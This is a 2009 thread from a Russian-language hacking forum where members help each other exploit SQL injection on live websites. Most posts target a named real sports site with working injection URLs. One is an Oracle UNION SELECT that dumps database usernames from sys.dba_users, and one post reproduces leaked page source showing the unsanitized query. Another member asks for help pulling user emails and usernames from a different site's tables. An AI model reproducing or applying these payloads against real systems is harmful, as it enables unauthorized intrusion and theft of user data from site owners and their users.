Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    http://is.kolpeex.com/
     
    1 person likes this.
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    очень странный скрипт... скуля есть... если зашли в тупик то нажимайте ctrl+r
    хз что думаете?
     
    #4722 sabe, 19 Jan 2009
    Last edited: 19 Jan 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 sabe:

    http://www.gotdotnet.ru/Forums/Web/342101.aspx

    Думаю, что просто сайт глючный и не более, чем раскрытие пути:

    Code:
    http://www.sportscn.com/program/vote/vote_result.php?voteid=2
    
    http://www.sportscn.com/program/vote/vote_result.php?voteid=226
    
    
    т.к. при таких положительных показателях без всяких там кавычек, минусов и % выдает идентичнуюошибку
     
    #4723 Pashkela, 19 Jan 2009
    Last edited: 19 Jan 2009
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Pashkela
    я знаю английский)) я спросил помочь...
    да сайт странный..... выдавать может что угодно незабывай ctrl+r
    а вобще скуля есть.. ибо вывод есть на or 1=1
     
  5. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Бугагагага, кхе

    http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+group+by+1--
    я взламал интернет.
    З.Ы. сорри за офф.
     
    #4725 AkyHa_MaTaTa, 19 Jan 2009
    Last edited: 19 Jan 2009
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    AkyHa_MaTaTa
    ORA-00979: not a GROUP BY expression
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    А мне в фф выкидует исходник страницы:
    PHP:
    <?
        require(
    "../lib/oci8_plus.inc");
        require(
    "../lib/function.inc");
    if(
    $voteid=="")
    $voteid 0;
    ?>
    <html>
    <head>
    <title>»ЄМеµчІй</title>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <link href="http://www.sportscn.com/css/newspcn.css" rel="stylesheet" type="text/css">
    </head>

    <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
    <table width="473" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr> 
        <td width="132" height="38" align="center" valign="top" background="http://image.sportscn.com/2006/news/tab_diaocha.jpg" class="a3" style="padding-top:7px">»Є 
          Ме µч Ій</td>
        <td width="341" align="right" valign="bottom" background="http://image.sportscn.com/2006/news/corner_diaocha.jpg"><div style="padding-right:14px"><img src="http://image.sportscn.com/2006/news/sportscn.gif" width="145" height="20"></div></td>
      </tr>
      <tr> 
        <td colspan="2" background="http://image.sportscn.com/2006/news/bg_diaocha.gif"> 
    <?
            $db=new OCI_PLUS;
            $db->open("info");
            $strsql = "select votename from comm_vote where voteid=".$voteid;
            $db->query($strsql);
            $db->movenext();
    ?>
          <table width="450" border="0" align="center" cellpadding="0" cellspacing="0">
             <tr>
              <td height="10" align="center">&nbsp;</td>
            </tr>
            <tr>
              <td height="32" align="center"><strong><?=$db->f("votename")?></strong></td>
            </tr>
          </table>
          <table width="450" border="1" align="center" cellpadding="0" cellspacing="0" bordercolorlight="C1C1C1"  bordercolordark="ffffff" bgcolor="C1C1C1">
    <?
            $strsql = "select sum(voteamount) as vote_sum from comm_vote_content where ";
            $strsql = $strsql."voteid = ".$voteid;
            $db->query($strsql);
            $db->movenext();
            $vote_sum = $db->f("vote_sum");

            $strsql = "select votecontentid,votecontent,voteamount from comm_vote_content ";
            $strsql = $strsql."where voteid = ".$voteid." order by votecontentid ASC";
            $db->query($strsql);
            $count = 0;
            while($db->movenext()){
                if(($count%2)==0)
                    $color = "F5F5F5";
                else
                    $color = "EAEAEA";
                if ($vote_sum<>0){
                    $per = number_format(($db->f("voteamount")/$vote_sum),4);
                }else{
                    $per = 0;
                }
                $tab_width = 250;
    ?>
            <tr  bgcolor="<?=$color?>"> 
              <td width="155" height="20" bgcolor="F5F5F5" style="padding-left:5px"><?=$db->f("votecontent")?></td>
              <td width="289" style="padding-left:5px"><img src="http://image.sportscn.com/2006/news/diaocha_bar.gif" width="<?=number_format($tab_width*$per,0)?>" height="12" align="absmiddle">&nbsp;&nbsp;&nbsp;<?=($per*100)?>%</td>
            </tr>
    <?
                  $count++;
            }
    ?>
            <tr  bgcolor="<?if(($count%2)==0) echo "F5F5F5";else echo "EAEAEA";?>"> 
              <td height="20" colspan="2" align="center">ДїЗ°№ІУРЈє<?=($vote_sum)?> ИЛІОјУ</td>
            </tr>
          </table>
          </td>
      </tr>
      <tr> 
        <td colspan="2"><img src="http://image.sportscn.com/2006/news/bottom_diaocha.gif" width="473" height="13"></td>
      </tr>

    </table>
    </body>
    </html>


    а вот настройки к бд http://www.sportscn.com/program/lib/oci8_plus.inc

    не не к бд, жз че какой то.
     
    #4727 AkyHa_MaTaTa, 19 Jan 2009
    Last edited: 19 Jan 2009
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    AkyHa_MaTaTa Ты не поверишь, но у всех так )
    sabe Нет там скули
    Исходник
    http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=1--
    http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=2--
    Страница
    http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=1--
    http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=2--
    Исходник
    http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=1--
    Страница
    http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=2--

    Логики не вижу , скорее идёт какая-то арифметика с аргументами
     
    1 person likes this.
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users--
    Если не работает с первого раза, нажимайте ctrl+r.
     
    2 people like this.
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    ну
    Блин, я думал что я зе оне, а оказываеться не так оно :mad: .
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Да жесть :D А объяснить сможешь, почему когда хочет тогда работает :)?
     
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Хацкеры интернет поломали ^^

    А если серьезно - хз. У меня иногда и страница: "voteid=1062" с ошибкой вылезает.
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    R1dex
    да ты один меня понял.. +

    jokester
    я же говоил обнвлять нужно все время.. скрипт видемо некоректный и передает данные с задержкой, возможно не с первого раза изза возникновения ошибок..
     
    #4733 sabe, 19 Jan 2009
    Last edited: 19 Jan 2009
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    что за фигня?)
    -1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5
    -1+union+select+1,2,3,4,5,6,7,version(),9+from+mysql.user+--+ ругается доступа нет
    с помощью SIPT узнал таблы)
    все таблы делятся на с префиксом VGB и просто другие
    допустим две таблицы VGB_USER и new_data
    вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_USER+--+ ничего нет
    в чем проблема?)
    база одна всего.
     
    #4734 j0ker13, 20 Jan 2009
    Last edited: 20 Jan 2009
  15. kolpeex

    kolpeex Member

    Joined:
    17 Feb 2008
    Messages:
    21
    Likes Received:
    8
    Reputations:
    0
    А права есть?
     
  16. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Вопрос:
    А через phpmyadmin можно посмотреть phpinfo?
     
  17. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2kolpeex к таблице от этого сайта нет доступа?) эт как?)) ошибок не выводит просто нет результата...
    даже при таком запросе
    =12+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,VGB_USER.EMAIL,poll_user.username),9+from+VGB_USER,poll_user+--+
    нет результата
     
    #4737 j0ker13, 20 Jan 2009
    Last edited: 20 Jan 2009
  18. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    ты не можешь читать таблицы с префиксом VGB, нету прав
     
  19. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user'
    а када к этим обращаешся нет ни ошибки ни вывода)
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    j0ker13, посмотри внимательно, может, всё таки не одна бд?
    А ещё лучше, дабы избежать ненужных гаданий, кинь линк.
     
Thread Status:
Not open for further replies.